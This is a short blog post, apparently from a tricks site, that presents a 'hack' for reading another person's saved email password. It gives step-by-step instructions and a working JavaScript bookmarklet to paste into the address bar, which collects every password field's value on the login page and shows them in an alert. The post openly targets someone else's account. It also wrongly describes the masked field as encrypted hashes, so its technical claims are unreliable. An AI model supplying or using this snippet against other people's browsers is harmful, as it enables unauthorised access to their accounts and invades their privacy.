E mail Passwords Hacked !!


If someone checks the box Remember me or Stay signed in below the password. His password is stored in encrypted format. But I have Hack by which you can get it Easily...

Type his username. You will see complete username below. Click it and press [TAB]. You will find password as hashes. which you cant read/copy.
Now copy the Following code and paste into address bar. and press enter.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page -niLsTricks.blogspot.com:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

No comments:

Post a Comment